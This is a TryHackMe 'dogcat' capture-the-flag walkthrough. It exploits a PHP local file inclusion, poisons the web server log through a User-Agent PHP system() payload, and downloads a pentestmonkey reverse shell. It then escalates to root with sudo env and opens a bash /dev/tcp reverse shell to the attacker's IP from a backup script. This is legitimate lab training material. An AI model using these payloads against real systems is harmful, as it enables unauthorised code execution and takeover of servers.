dogcat TryHackMe walkthrough


This is a medium difficulty machine which shows the pictures of dogs and cats.

when clicking on the buttons A dog/ A cat it randomly shows the pictures. Here the URL gives a chance of local file inclusion vulnerability. i.e


So tried some of the php filter methods. And succeeded with this one,


source: Link

 By entering this URL . We get a base64 encoded hash.

So its working. 

 Then we try /../index to get the source code index.


 Then we got a long hash it must be the source code index.

So decode it. 

$echo "Base64_HASH" |base64 -d


In the source code we got very much vital code. which is,

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';

Here the code checks the extension , and we can give this manually in our URL.


and we got the /etc/passwd file.

 So now we have access to the files . but we need a remote code execution. for that we have to access the log file.


By this we can view the log file.


To get a command execution we execute the following command.

curl "http://Machine_IP/" -H "User-Agent: <?php system(\$_GET['c']); ?>"

By executing the command we got the following warning in the log file.

 It says that cannot execute blank command. Because we didn't give a value to 'c'. 

Lets give a value to c. c=id


In the log we got the result.

 Now we can upload a reverse shell in to the machine. download php reverse shell from pentestmonkey. Edit the IP and port. 

then run simple http server using python in your system.

 python -m SimpleHTTPServer 80

And run the following command on the browser to download our php shell.

  curl http://My_IP:80/shell.php -o shell.php

  By executing this commands we successfully uploaded the shell.php in the target machine. We can check this running 'ls' .

 Now setup a netcat listener in our system.

nc -lnvp 1234  (1234 is the port I given in the reverse shell)

In the browser simply open the shell.php.


Now we got a reverse shell.

 $ /usr/bin/script -qc /bin/bash /dev/null

By running this command we get a more persistent interactive shell.

Now we want to find the 4 flags.


  first flag is inside the /var/www/html

 second flag is inside the /var/www

Privilege Escalation :

Now we try to escalate privilege . because we dont have permission to the root directory. For that we try the command,

sudo -l

 Here we can run /usr/bin/env with root privilege without password.

Searching in GTFOBins . we got the following command


 sudo env /bin/sh

Now I'am root.

 In the root directory we got the 3rd flag.

Now the 4th flag is little tricky . because it is not inside this box. It is some sort of another file system contains the 4th flag. In /opt directory there is a backups dorectory and it contains two files and backup.tar these file has connection to the other box So using this we get reverse connection to that machine.


echo "#! /bin/bash" >                     

echo "/bin/bash -c 'bash -i >& /dev/tcp/My_IP/4444 0>&1'" >>

nc -lnvp 4444       (In our machine)

wait a minute to get the reverse connection.

Now we got the 4th flag.